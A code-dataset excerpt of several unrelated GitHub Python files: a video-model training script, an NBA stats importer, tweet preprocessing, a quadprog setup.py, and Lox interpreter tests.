print(\"data_path : %s\" % args.root_path)\n print(\"train_list: %s\" % args.train_list)\n print(\"val_list : %s\" % args.val_list)\n print(\"%s: %d classes\" % (args.dataset, args.num_class))\n\n # train_augmentation = model.module.get_augmentation(\n # flip=False if 'something' in args.dataset or 'jester' in args.dataset else True)\n\n train_transform_flip = torchvision.transforms.Compose([\n model.module.get_augmentation(flip=True),\n Stack(roll=(\"BNInc\" in args.arch)),\n ToTorchFormatTensor(div=(\"BNInc\" not in args.arch)),\n GroupNormalize(model.module.input_mean, model.module.input_std),\n ])\n\n train_transform_nofl = torchvision.transforms.Compose([\n model.module.get_augmentation(flip=False),\n Stack(roll=(\"BNInc\" in args.arch)),\n ToTorchFormatTensor(div=(\"BNInc\" not in args.arch)),\n GroupNormalize(model.module.input_mean, model.module.input_std),\n ])\n\n val_transform = torchvision.transforms.Compose([\n 
GroupScale(int(model.module.scale_size)),\n GroupCenterCrop(model.module.crop_size),\n Stack(roll=(\"BNInc\" in args.arch)),\n ToTorchFormatTensor(div=(\"BNInc\" not in args.arch)),\n GroupNormalize(model.module.input_mean, model.module.input_std),\n ])\n\n train_dataset = TSNDataSet(args.root_path, args.train_list,\n num_segments=args.num_segments,\n image_tmpl=prefix,\n transform=(train_transform_flip, train_transform_nofl),\n dense_sample=args.dense_sample,\n dataset=args.dataset,\n filelist_suffix=args.filelist_suffix,\n folder_suffix=args.folder_suffix,\n save_meta=args.save_meta,\n always_flip=args.always_flip,\n conditional_flip=args.conditional_flip,\n adaptive_flip=args.adaptive_flip,\n rank=args.rank)\n\n val_dataset = TSNDataSet(args.root_path, args.val_list,\n num_segments=args.num_segments,\n image_tmpl=prefix,\n random_shift=False,\n transform=(val_transform, val_transform),\n dense_sample=args.dense_sample,\n dataset=args.dataset,\n filelist_suffix=args.filelist_suffix,\n folder_suffix=args.folder_suffix,\n save_meta=args.save_meta,\n rank=args.rank)\n\n train_loader = build_dataflow(train_dataset, True, args.batch_size, args.workers, args.distributed, args.not_pin_memory)\n val_loader = build_dataflow(val_dataset, False, args.batch_size, args.workers, args.distributed, args.not_pin_memory)\n\n if args.dataset == \"epic\":\n train_loader.a_v_m = train_dataset.a_v_m\n train_loader.a_n_m = train_dataset.a_n_m\n val_loader.a_v_m = val_dataset.a_v_m\n val_loader.a_n_m = val_dataset.a_n_m\n else:\n train_loader.a_v_m = None\n train_loader.a_n_m = None\n val_loader.a_v_m = None\n val_loader.a_n_m = None\n\n return train_loader, val_loader\n\ndef take_care_of_pretraining(sd, args):\n old_to_new_pairs = []\n if args.downsample0_renaming:\n for k in sd:\n if \"downsample0\" in k:\n old_to_new_pairs.append((k, k.replace(\"downsample0\", \"downsample.0\")))\n elif \"downsample1\" in k:\n old_to_new_pairs.append((k, k.replace(\"downsample1\", \"downsample.1\")))\n\n if args.downsample_0_renaming or (any([args.use_segk8, args.use_tsmk8, args.use_tsmk16]) and args.ada_reso_skip): # use_tsmk16, matching the pretrained-checkpoint trio checked in main() (it was listed as use_tsmk8 twice)\n for k in sd:\n if \"downsample.0\" in k:\n old_to_new_pairs.append((k, k.replace(\"downsample.0\", \"downsample0\")))\n elif \"downsample.1\" in k:\n old_to_new_pairs.append((k, k.replace(\"downsample.1\", \"downsample1\")))\n\n for old_key, new_key in old_to_new_pairs:\n sd[new_key] = sd.pop(old_key)\n old_to_new_pairs = [] # (a second, identical loop over this just-emptied list was a no-op)\n\n if args.shift and args.ada_reso_skip:\n for k in sd:\n if \"conv1.net.\" in k:\n old_to_new_pairs.append((k, k.replace(\"conv1.net.\", \"conv1.\")))\n for old_key, new_key in old_to_new_pairs:\n sd[new_key] = sd.pop(old_key)\n\n del_keys = []\n if args.ignore_new_fc_weight or any([args.use_segk8, args.use_tsmk8, args.use_tsmk16]): # use_tsmk16 again (same duplication as above)\n del_keys += [k for k in sd if \"module.new_fc\" in k]\n for k in del_keys:\n del sd[k]\n\n del_keys = []\n if args.ignore_loading_gate_fc:\n del_keys += [k for k in sd if \"gate_fc\" in k]\n for k in del_keys:\n del sd[k]\n return sd\n\ndef handle_frozen_things_in(model, args):\n # TODO(yue) freeze some params in the policy + lstm layers\n if args.freeze_policy:\n for name, param in model.module.named_parameters():\n if \"lite_fc\" in name or \"lite_backbone\" in name or \"rnn\" in name or \"linear\" in name:\n param.requires_grad = False\n\n if args.freeze_backbone:\n for name, param in model.module.named_parameters():\n if \"base_model\" in name:\n 
param.requires_grad = False\n if len(args.frozen_list) > 0:\n for name, param in model.module.named_parameters():\n for keyword in args.frozen_list:\n if keyword[0] == \"J\":\n if keyword[-1] == \"J\": # TODO middle\n if keyword[1:-1] in name:\n param.requires_grad = False\n if args.rank==0:\n print(keyword, \"->\", name, \"frozen\")\n else: # TODO suffix\n if name.endswith(keyword[1:]):\n param.requires_grad = False\n if args.rank == 0:\n print(keyword, \"->\", name, \"frozen\")\n elif keyword[-1] == \"J\": # TODO prefix\n if name.startswith(keyword[:-1]):\n param.requires_grad = False\n if args.rank == 0:\n print(keyword, \"->\", name, \"frozen\")\n else: # TODO exact word\n if name == keyword:\n param.requires_grad = False\n if args.rank == 0:\n print(keyword, \"->\", name, \"frozen\")\n if args.rank == 0:\n print(\"=\" * 80)\n for name, param in model.module.named_parameters():\n print(param.requires_grad, \"\\t\", name)\n\n if len(args.frozen_layers) > 0:\n for layer_idx in args.frozen_layers:\n for name, param in model.module.named_parameters():\n if layer_idx == 0:\n if \"list.0.conv1\" in name:\n param.requires_grad = False\n if args.rank == 0:\n print(layer_idx, \"->\", name, \"frozen\")\n else:\n if \"list.0.layer%d\" % layer_idx in name and (\"conv\" in name or \"downsample.0\" in name):\n param.requires_grad = False\n if args.rank == 0:\n print(layer_idx, \"->\", name, \"frozen\")\n if args.freeze_corr_bn:\n for km in model.named_modules():\n k, m = km\n if layer_idx == 0:\n if \"bn1\" in k and \"layer\" not in k and isinstance(m, nn.BatchNorm2d): # TODO(yue)\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n if args.rank == 0:\n print(layer_idx, \"->\", k, \"frozen batchnorm\")\n else:\n if \"layer%d\" % (layer_idx) in k and isinstance(m, nn.BatchNorm2d): # TODO(yue)\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n if args.rank == 0:\n print(layer_idx, \"->\", k, \"frozen batchnorm\")\n if args.rank == 0:\n print(\"=\" * 80)\n for name, param in model.module.named_parameters():\n print(param.requires_grad, \"\\t\", name)\n\n\nif __name__ == '__main__':\n t0 = time.time()\n main()\n print(\"Finished in %.4f seconds\\n\" % (time.time() - t0))\n","repo_name":"mengyuest/temporal-shift-module","sub_path":"main_gate.py","file_name":"main_gate.py","file_ext":"py","file_size_in_byte":64242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42915297291","text":"import time\nimport pandas as pd\nimport pymysql\nfrom nba_api.stats.endpoints import commonplayerinfo, PlayerGameLog\nfrom nba_api.stats.endpoints import leaguegamefinder\nfrom nba_api.stats.library.parameters import SeasonTypeAllStar\nfrom nba_api.stats.static.players import *\nfrom nba_api.stats.static.teams import *\n\n\n# create player\ndef import_players(cursor):\n \"\"\"\n Pulls from NBA API to update players\n :param cursor:\n :return:\n \"\"\"\n # Find all player_ids from players table\n print(\"Updating Players from API...\")\n cursor.callproc('get_players')\n existing_player_ids = cursor.fetchall()\n existing_player_ids = [player['player_id'] for player in existing_player_ids]\n\n # Get all active players from nba_api\n player_info = get_active_players()\n players_added = 0\n for player in player_info:\n if player['id'] not in existing_player_ids:\n try:\n players_added += 1\n playerCommonInfo = commonplayerinfo.CommonPlayerInfo(player['id'])\n player_api = playerCommonInfo.get_dict()\n keys = 
player_api['resultSets'][0]['headers']\n values = player_api['resultSets'][0]['rowSet'][0]\n if len(keys) != len(values):\n players_added -= 1\n continue\n player_dict = dict(zip(keys, values))\n if player_dict['DRAFT_ROUND'] == 'Undrafted':\n players_added -= 1\n continue\n\n if len(player_dict['JERSEY']) > 2:\n player_dict.update({'JERSEY': re.split(r'\\D', player_dict['JERSEY'])[-1]})\n\n if player_dict['JERSEY'] == '':\n player_dict.update({'JERSEY': None})\n\n if player_dict['HEIGHT'] == '':\n player_dict.update({'HEIGHT': None})\n\n if player_dict['HEIGHT'] is not None:\n feet, inches = player_dict['HEIGHT'].split('-')\n player_dict.update({'HEIGHT': float(feet) + (float(inches) / 100)})\n\n if player_dict['POSITION'] == '' or player_dict['POSITION'] is None:\n player_dict.update({'POSITION': 'Unknown'})\n else:\n cursor.callproc('get_positions')\n existing_positions = cursor.fetchall()\n existing_positions = [position['position_name'] for position in\n existing_positions]\n if player_dict['POSITION'] not in existing_positions:\n cursor.callproc('create_position',\n (player_dict['POSITION'],))\n else:\n player_dict.update(\n {'POSITION': existing_positions.index(player_dict['POSITION'])})\n cursor.callproc('create_player_api',\n (player_dict['PERSON_ID'],\n player_dict['FIRST_NAME'],\n player_dict['LAST_NAME'],\n player_dict['BIRTHDATE'],\n player_dict['HEIGHT'],\n player_dict['POSITION'],\n player_dict['JERSEY'],\n True if player_dict['ROSTERSTATUS'] == 'Active' else False,\n player_dict['SEASON_EXP'],\n player_dict['TEAM_ID'],\n player_dict['TO_YEAR']))\n time.sleep(1)\n print(\"Creating player: %s on the %s\" % (\n player_dict['DISPLAY_FIRST_LAST'], player_dict['TEAM_NAME']))\n except pymysql.Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n players_added -= 1\n continue\n return print(\"Added %s players to the database.\" % players_added)\n\n\ndef import_teams(cursor):\n \"\"\"\n Pulls from NBA API to update teams\n :param cursor:\n :return:\n \"\"\"\n print(\"Updating Teams from API...\")\n cursor.callproc('get_teams')\n existing_team_ids = cursor.fetchall()\n existing_team_ids = [team['team_id'] for team in existing_team_ids]\n\n team_info = get_teams()\n teams_added = 0\n for team in team_info:\n if team['id'] not in existing_team_ids:\n try:\n teams_added += 1\n print(\"Created team: %s (%s)\" % (team['full_name'],\n team['id']))\n cursor.callproc('create_team',\n (team['full_name'],\n team['abbreviation'],\n team['nickname'],\n team['city'],\n team['state'],\n team['year_founded']))\n except pymysql.Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n teams_added -= 1\n continue\n\n return print(\"Added %s teams to the database.\" % teams_added)\n\n\ndef combine_team_games(df, keep_method='home'):\n \"\"\"Combine a TEAM_ID-GAME_ID unique table into rows by game. Slow.\n\n Parameters\n ----------\n df : Input DataFrame.\n keep_method : {'home', 'away', 'winner', 'loser', ``None``}, default 'home'\n - 'home' : Keep rows where TEAM_A is the home team.\n - 'away' : Keep rows where TEAM_A is the away team.\n - 'winner' : Keep rows where TEAM_A is the winning team.\n - 'loser' : Keep rows where TEAM_A is the losing team.\n - ``None`` : Keep all rows. 
Will result in an output DataFrame the same\n length as the input DataFrame.\n\n Returns\n -------\n result : DataFrame\n \"\"\"\n # Join every row to all others with the same game ID.\n joined = pd.merge(df, df, suffixes=['_A', '_B'],\n on=['SEASON_ID', 'GAME_ID', 'GAME_DATE'])\n # Filter out any row that is joined to itself.\n result = joined[joined.TEAM_ID_A != joined.TEAM_ID_B]\n # Take action based on the keep_method flag.\n if keep_method is None:\n # Return all the rows.\n pass\n elif keep_method.lower() == 'home':\n # Keep rows where TEAM_A is the home team.\n result = result[result.MATCHUP_A.str.contains(' vs. ')]\n elif keep_method.lower() == 'away':\n # Keep rows where TEAM_A is the away team.\n result = result[result.MATCHUP_A.str.contains(' @ ')]\n elif keep_method.lower() == 'winner':\n result = result[result.WL_A == 'W']\n elif keep_method.lower() == 'loser':\n result = result[result.WL_A == 'L']\n else:\n raise ValueError(f'Invalid keep_method: {keep_method}')\n return result\n\n\ndef import_games(cursor, season):\n \"\"\"\n Pulls from NBA API to update games\n :param cursor:\n :param season:\n :return:\n \"\"\"\n # Get list of existing game IDs\n cursor.callproc('get_games')\n existing_game_ids = cursor.fetchall()\n existing_game_ids = [game['game_id'] for game in existing_game_ids]\n\n # Create list of new game IDs\n new_game_ids = []\n\n # Get list of teams\n cursor.callproc('get_teams')\n team_results = cursor.fetchall()\n team_results.pop(0)\n for team in team_results:\n print(\"Checking for new games for %s in %s Season\" % (team['team_name'], season))\n for season_type in [SeasonTypeAllStar.regular, SeasonTypeAllStar.playoffs]:\n time.sleep(1)\n game_finder = leaguegamefinder.LeagueGameFinder(team_id_nullable=team['team_id'],\n season_nullable=season,\n season_type_nullable=season_type)\n games = game_finder.get_dict()\n\n keys = games['resultSets'][0]['headers']\n values = games['resultSets'][0]['rowSet']\n for value in values:\n if len(value) == len(keys):\n game_dict = dict(zip(keys, value))\n game_id = int(game_dict['GAME_ID'])\n if game_id not in existing_game_ids and game_id not in new_game_ids:\n print(\"Found new game: %s\" % game_dict['GAME_ID'])\n new_game_ids.append(game_dict['GAME_ID'])\n\n if len(new_game_ids) == 0:\n return print(\"No new games found for %s Season\" % season)\n else:\n games_added = 0\n for season_type in [SeasonTypeAllStar.regular, SeasonTypeAllStar.playoffs]:\n result = leaguegamefinder.LeagueGameFinder(season_nullable=season,\n season_type_nullable=season_type)\n all_games = result.get_data_frames()[0]\n for game in new_game_ids:\n try:\n full_game = all_games[all_games['GAME_ID'] == game]\n game_df = combine_team_games(full_game)\n if not game_df['WL_A'].empty and not game_df['WL_B'].empty:\n if game_df['WL_A'].iloc[0] == 'W':\n game_df['WINNER'] = game_df['TEAM_ID_A']\n elif game_df['WL_B'].iloc[0] == 'W':\n game_df['WINNER'] = game_df['TEAM_ID_B']\n else:\n game_df['WINNER'] = None\n GAME_ID = game_df['GAME_ID'].iloc[0]\n DATE = game_df['GAME_DATE'].iloc[0]\n TEAM_ID_A = game_df['TEAM_ID_A'].iloc[0]\n TEAM_ID_B = game_df['TEAM_ID_B'].iloc[0]\n PTS_A = game_df['PTS_A'].iloc[0]\n PTS_B = game_df['PTS_B'].iloc[0]\n WINNER = game_df['WINNER'].iloc[0]\n\n cursor.callproc('create_game_api',\n (GAME_ID,\n TEAM_ID_A,\n TEAM_ID_B,\n PTS_A,\n PTS_B,\n DATE,\n WINNER))\n print(\"Created game with game id %s\" % GAME_ID)\n games_added += 1\n except pymysql.Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n\n return 
print(\"Created %s new games\" % games_added)\n\n\ndef import_player_stats(cursor, season):\n \"\"\"\n Imports player stats for a given season\n :param cursor:\n :param season:\n :return:\n \"\"\"\n cursor.callproc('get_players')\n all_players = cursor.fetchall()\n all_players = [player for player in all_players if player['is_active'] == 1]\n player_stats_added = 0\n for player in all_players:\n print(\"Checking stats for: %s %s (%s)\" % (player['first_name'],\n player['last_name'],\n player['player_id']))\n for season_type in [SeasonTypeAllStar.regular, SeasonTypeAllStar.playoffs]:\n # Gets the game log for each season\n player_game_log = PlayerGameLog(player_id=player['player_id'],\n season=season,\n season_type_all_star=season_type).get_data_frames()[0]\n for i in range(len(player_game_log)):\n cursor.callproc('get_stat',\n (player['player_id'], player_game_log['Game_ID'].iloc[i]))\n stat = cursor.fetchone()\n if stat is None:\n game_id = player_game_log['Game_ID'].iloc[i]\n points = player_game_log['PTS'].iloc[i]\n assists = player_game_log['AST'].iloc[i]\n rebounds = player_game_log['REB'].iloc[i]\n steals = player_game_log['STL'].iloc[i]\n blocks = player_game_log['BLK'].iloc[i]\n turnovers = player_game_log['TOV'].iloc[i]\n fouls = player_game_log['PF'].iloc[i]\n minutes_played = player_game_log['MIN'].iloc[i]\n\n try:\n cursor.callproc('create_player_game_stats',\n (player['player_id'],\n game_id,\n points,\n assists,\n rebounds,\n steals,\n blocks,\n turnovers,\n fouls,\n minutes_played))\n except pymysql.Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n continue\n print(\"Updated player stats for %s %s (%s)\" % (player['first_name'],\n player['last_name'],\n player['player_id']))\n player_stats_added += 1\n time.sleep(0.25)\n\n return print(\"Updated stats for %s players\" % player_stats_added)\n","repo_name":"Romangino/CS5200-final-project","sub_path":"data_setup/import_data.py","file_name":"import_data.py","file_ext":"py","file_size_in_byte":13557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12699762176","text":"import os\nimport csv as csv\nfrom nltk.tag import pos_tag\nfrom nltk.stem.wordnet import WordNetLemmatizer\nimport re, string\nfrom nltk.corpus import stopwords\nfrom nltk.tag import (pos_tag)\nimport jsonlines\nfrom datetime import datetime\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import twitter_samples\nimport io\nimport json\n\nstoplist = set(stopwords.words('english'))\nfiles_location = 'C:\\\\Users\\\\Sydney\\\\Documents\\\\College\\\\IndependentStudy'\nneg_data_list = []\npos_data_list = []\nunlabeled_data_list = []\n\npositive_cleaned_tokens = []\nnegative_cleaned_tokens = []\nneutral_cleaned_tokens = []\nunlabeled_cleaned_tokens = []\n\n\ndef extract_data(location):\n output_file = location + \"\\\\unlabeled_US_data.csv\"\n input_file = location + \"\\\\hydrated_compiled_data.jsonl\"\n if not os.path.exists(input_file):\n print(\"uh oh better fix that\")\n if os.path.exists(output_file):\n os.remove(output_file)\n\n with open(output_file, 'w+', newline='', encoding=\"utf8\") as writefile:\n with jsonlines.open(input_file) as readfile:\n w = csv.writer(writefile)\n r = jsonlines.Reader(input_file)\n for row in readfile:\n obj = []\n if row['place'] is not None and row['place']['country_code'] == 'US':\n orig_timedate = row['created_at']\n date_obj = datetime.strptime(orig_timedate, \"%a %b %d %H:%M:%S %z %Y\")\n obj.append(date_obj)\n obj.append(row['id'])\n 
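# e.g. the format above parses Twitter timestamps like \"Wed Oct 10 20:19:24 +0000 2018\" into timezone-aware datetimes\n 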
obj.append(row['place']['country_code'])\n obj.append(row['full_text'])\n w.writerow(obj)\n\n\ndef count_labeled_data(location):\n neutral = 0\n positive = 0\n negative = 0\n\n with open(location, 'r', newline='', encoding='utf8') as readfile:\n r = csv.reader(readfile, delimiter=',')\n for row in r:\n if row[4] == \"1\":\n positive = positive + 1\n elif row[4] == \"0\":\n neutral = neutral + 1\n elif row[4] == \"-1\":\n negative = negative + 1\n print(\"Positive: \" + str(positive))\n print(\"Neutral: \" + str(neutral))\n print(\"Negative: \" + str(negative))\n print(\"Total: \" + str(negative + neutral + positive))\n\n\ndef make_json_file(folder_location):\n csv_file = folder_location + \"\\\\all_labeled_data.csv\"\n pos_file = folder_location + \"\\\\positive_data.json\"\n neg_file = folder_location + \"\\\\negative_data.json\"\n unlabeled_file = folder_location + \"\\\\unlabeled_data.json\"\n\n with open(pos_file, 'w+', newline='', encoding=\"utf8\") as pos_data, \\\n open(neg_file, 'w+', newline='', encoding=\"utf8\") as neg_data, \\\n open(unlabeled_file, 'w+', newline='', encoding=\"utf8\") as unlabeled_data:\n\n with open(csv_file, 'r', newline='', encoding='utf-8') as readfile:\n fieldnames = (\"date\", \"tweet_id\", \"country_code\", \"text\", \"label\")\n reader = csv.DictReader(readfile, fieldnames)\n for row in reader:\n initial_clean_tweet = clean_tweet(row['text'])\n if row['label'] == \"-1\":\n if not initial_clean_tweet.isspace():\n tokens = lemm_data(word_tokenize(initial_clean_tweet), stoplist)\n if len(tokens) > 0:\n negative_cleaned_tokens.append(tokens)\n\n elif row['label'] == \"1\":\n if not initial_clean_tweet.isspace():\n tokens = lemm_data(word_tokenize(initial_clean_tweet), stoplist)\n if len(tokens) > 0:\n positive_cleaned_tokens.append(tokens)\n\n elif row['label'] == \"0\":\n if not initial_clean_tweet.isspace():\n tokens = lemm_data(word_tokenize(initial_clean_tweet), stoplist)\n if len(tokens) > 0:\n neutral_cleaned_tokens.append(tokens)\n\n else:\n if not initial_clean_tweet.isspace():\n # unlabeled_data_list.append(word_tokenize(initial_clean_tweet))\n unlabeled_cleaned_tokens.append(lemm_data(word_tokenize(initial_clean_tweet), stoplist))\n # json.dump(row, unlabeled_data)\n\n # normalize/lemmatize tokens\n # for tweet in neg_data_list:\n # negative_cleaned_tokens.append(lemm_data(tweet, stoplist))\n # for tweet in pos_data_list:\n # positive_cleaned_tokens.append(lemm_data(tweet, stoplist))\n # for tweet in unlabeled_data_list:\n # unlabeled_cleaned_tokens.append(lemm_data(tweet, stoplist))\n\n return negative_cleaned_tokens, positive_cleaned_tokens, neutral_cleaned_tokens, unlabeled_cleaned_tokens\n\n\ndef clean_tweet(data):\n location = 0\n while True:\n location = data.find('@', location + 1)\n location = int(location)\n if location == -1:\n break\n elif location < len(data):\n if data[location + 1] == ' ':\n data = data[: location]\n break\n else:\n space_location = data.find(' ')\n data = data[location: space_location]\n\n # Remove URL's\n data = re.sub('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', '', data)\n # Remove numbers\n data = re.sub(r'[0-9]', '', data)\n # Remove unknown symbols (like emojis)\n data = re.sub(r'[^\\x00-\\x7f]', '', data)\n # Remove Emails\n data = re.sub(r'\\S*@\\S*\\s?', '', data)\n # Remove new line characters\n data = re.sub(r'\\s+', ' ', data)\n\n data = re.sub('((\\d+)[\\.])(?!([\\d]+))', '\\g<2>', data)\n\n data = re.sub('[/_-]', '', data)\n\n return data.lower()\n\n\ndef 
lemm_data(tweet_tokens, stop_words=()):\n cleaned_tokens = []\n for token, tag in pos_tag(tweet_tokens):\n if tag.startswith(\"NN\"):\n pos = 'n'\n elif tag.startswith('VB'):\n pos = 'v'\n else:\n pos = 'a'\n\n if token == \"'s\":\n token = \"is\"\n elif token == \"'ve\":\n token = \"have\"\n elif token == \"covid-\" or token == \"corona\" or token == \"coronavirus\":\n token = \"covid\"\n elif token == \"'re\":\n token = \"are\" # assignment, not comparison\n elif token == \"'t\":\n token = \"not\" # assignment, not comparison\n\n lemmatizer = WordNetLemmatizer()\n token = lemmatizer.lemmatize(token, pos)\n\n if len(token) > 1 and token not in string.punctuation and token.lower() not in stop_words:\n cleaned_tokens.append(token.lower())\n #print(cleaned_tokens)\n return cleaned_tokens\n\n\ndef get_all_words(positive):\n for tokens in positive:\n for token in tokens:\n yield token\n\n\ndef get_tweets_for_model(token_list):\n for tweet_tokens in token_list:\n yield dict([token, True] for token in tweet_tokens)\n\n\n# OLD: built for using a jsonl file converted to csv\ndef extract_needed_data():\n all_hydrated_data = files_location + \"/hydrated_data.csv\"\n output_file = files_location + \"/US_data_UNLABELED.csv\"\n if not os.path.exists(all_hydrated_data):\n print(\"not cool\")\n if os.path.exists(output_file):\n os.remove(output_file)\n\n with open(output_file, 'w+', newline='', encoding=\"utf8\") as writefile:\n with open(all_hydrated_data, encoding=\"utf8\") as readfile:\n r = csv.reader(readfile, delimiter=',')\n w = csv.writer(writefile)\n for row in r:\n row_data = []\n colCount = 0\n for cell in range(len(row)):\n cell_data = row[cell]\n if cell_data[:14] == '{\"created_at\":':\n date_string = cell_data[15:(len(cell_data) - 1)]\n # reformat timestamp\n date_obj = datetime.strptime(date_string, \"%a %b %d %H:%M:%S %z %Y\")\n if cell_data[:3] == \"id:\" and len(row_data) == 1:\n tweet_id = cell_data[3:(len(cell_data) - 1)]\n if colCount == 3:\n full_text = cell_data[11:]\n if (colCount == 4 or colCount == 5 or colCount == 6) and (\n cell_data != \"truncated:false\" and cell_data[:19] != \"display_text_range:\"):\n full_text = full_text + \" \" + cell_data\n # if cell_data[:10] == \"full_text:\":\n # full_text = cell_data[11:]\n if cell_data[:13] == \"country_code:\":\n country_code = cell_data[14:(len(cell_data) - 1)]\n colCount = colCount + 1\n\n if country_code == \"US\":\n row_data.append(date_obj)\n row_data.append(country_code)\n row_data.append(full_text)\n if len(row_data) == 3:\n w.writerow(row_data)\n print(\"Done extracting.\")\n","repo_name":"sydneyberry/IndependentStudy","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":8976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"11522295283","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 3 21:15:19 2015\n@author: rwalker (r_walker@zoho.com)\n\"\"\"\nfrom __future__ import division, absolute_import, print_function\nfrom numpy.distutils.core import setup, Extension\nfrom numpy.distutils.misc_util import Configuration\nfrom numpy.distutils.system_info import get_info\n\n# fortran/f2py source files\nfsource = ['src/pyquadprog.pyf', \n 'src/achck.f', \n 'src/aind.f', \n 'src/solve.QP.compact.f', \n 'src/solve.QP.f', \n 'src/util.f']\n\nquadprog_ext = Extension( name = 'pyquadprog', sources=fsource, libraries=[\"blas\",\"lapack\"])\n\nif __name__ == \"__main__\":\n setup(name='quadprog',\n version='0.1',\n description='Python binding for Berwin Turlach\'s quadprog routine.',\n 
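# building this f2py extension needs a Fortran compiler plus BLAS/LAPACK; note numpy.distutils is deprecated on recent NumPy/Python\n 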
url='http://github.com/rwalk333/pyquadprog',\n author='rwalker',\n author_email='r_walker@zoho.com',\n py_modules = ['quadprog'],\n license='GPL V2',\n ext_modules=[quadprog_ext])\n","repo_name":"rwalk/pyquadprog","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3882743795","text":"import subprocess\nfrom subprocess import PIPE\n\nimport unittest\n\ndef process_stdout(data: bytearray):\n s = data.decode('utf-8')\n s = s.strip().replace(\"\\r\\n\", \"\\n\")\n return s\n\ndef process_expected(s: str):\n return \"\\n\".join(\n line.strip() for line in s.splitlines()\n ).strip()\n\ndef process_stderr(data: bytearray):\n return data.decode(\"utf-8\")\n\ndef exec_program(program, timeout=1):\n proc = subprocess.Popen(\n [\"python\", \"lox.py\", \"--\"], \n stdin=PIPE, stdout=PIPE, stderr=PIPE)\n stdout, stderr = proc.communicate(program.encode(\"utf-8\"), timeout=timeout)\n return process_stdout(stdout), process_stderr(stderr)\n\nclass Tests(unittest.TestCase):\n def test_print_literals(self):\n program = \"\"\"\n print 1;\n print -1;\n print 1.25;\n print -1.25;\n print true;\n print false;\n print nil;\n print \"hello\";\n \"\"\"\n\n expected = process_expected(\"\"\"\n 1\n -1\n 1.25\n -1.25\n true\n false\n nil\n hello\n \"\"\")\n\n stdout, stderr = exec_program(program)\n self.assertEqual(expected, stdout)\n self.assertEqual(\"\", stderr)\n\n def test_assignment(self):\n program = \"\"\"\n var a = 1;\n var b = 2;\n var c;\n c = a + b;\n print c;\n \"\"\"\n expected = process_expected(\"3\")\n \n stdout, stderr = exec_program(program)\n self.assertEqual(expected, stdout)\n self.assertEqual(\"\", stderr)\n\n def test_assignment_expr(self):\n program = \"\"\"\n var a; var b; var c;\n a = b = c = 2;\n print a == b and b == c;\n \"\"\"\n expected = process_expected(\"true\")\n \n stdout, stderr = exec_program(program)\n self.assertEqual(expected, stdout)\n self.assertEqual(\"\", stderr)\n\n def test_if(self):\n ...\n\n def test_while(self):\n program_1 = \"\"\"\n while (false) print 1;\n \"\"\"\n expected_1 = \"\"\n\n stdout_1, stderr_1 = exec_program(program_1)\n self.assertEqual(expected_1, stdout_1)\n self.assertEqual(\"\", stderr_1)\n\n program_2 = \"\"\"\n var a = 1;\n while (a) { print a; a = 0; }\n \"\"\"\n expected_2 = \"1\"\n stdout_2, stderr_2 = exec_program(program_2)\n self.assertEqual(expected_2, stdout_2)\n self.assertEqual(\"\", stderr_2)\n\n # Fibonacci numbers below 20\n program_3 = \"\"\"\n var temp;\n var a = 1;\n var b = 1;\n while (a < 20) { \n print a;\n temp = a;\n a = b;\n b = temp + b;\n }\n \"\"\"\n expected_3 = process_expected(\"\\n\".join(map(str, [1,1,2,3,5,8,13])))\n stdout_3, stderr_3 = exec_program(program_3)\n self.assertEqual(expected_3, stdout_3)\n self.assertEqual(\"\", stderr_3)\n\n def test_while_nested(self):\n program = \"\"\"\n var a = 1;\n while (a < 5) {\n var b = a;\n while (b < 5) {\n var c = b;\n while (c < 10) {\n c = c + 1;\n }\n b = c;\n }\n a = b;\n while (a < 5) {\n a = 1000;\n }\n }\n print a;\n \"\"\"\n expected = \"10\"\n\n stdout, stderr = exec_program(program)\n self.assertEqual(expected, stdout)\n self.assertEqual(\"\", stderr)\n\n def test_break(self):\n ...\n \n def test_break_nested(self):\n ...\n\n def test_break_errors(self):\n prog_1 = \"break;\"\n stdout_1, stderr_1 = exec_program(prog_1)\n self.assertEqual(\"\", stdout_1)\n self.assertEqual(\n stderr_1.strip(), \n \"[line 1] Error at 
'break': Expect 'break' to appear inside a loop.\"\n )\n\n prog_2 = \"\"\"\n while (false) break;\n break; \n \"\"\"\n stdout_2, stderr_2 = exec_program(prog_2)\n self.assertEqual(\"\", stdout_2)\n self.assertEqual(\n stderr_2.strip(), \n \"[line 1] Error at 'break': Expect 'break' to appear inside a loop.\"\n )\n\n prog_3 = \"\"\"\n break; \n while (false) break;\n \"\"\"\n stdout_3, stderr_3 = exec_program(prog_3)\n self.assertEqual(\"\", stdout_3)\n self.assertEqual(\n stderr_3.strip(), \n \"[line 1] Error at 'break': Expect 'break' to appear inside a loop.\"\n )\n \n \n\n\n\n \n\n\n\n# TODO: Test the following\n# * expressions: all mathematical operators, string concat, logical operators (==, <, >, !), unary ops\n# * and, or\n# * Bracketing\n# * Expression precedence\n# * Statements: If, For, While\n# * Blocks: shadowing, nesting, \n# * Error handling: scanning, parsing and runtime errors\n# * Var declaration after if/while/for without block\n\n \n\n\n \n","repo_name":"jonaengs/plox","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31091305445","text":"import dash\nimport dash_bootstrap_components as dbc\nimport pandas as pd\nimport plotly.express as px\nfrom dash import html, dcc, Output, Input, callback\nfrom 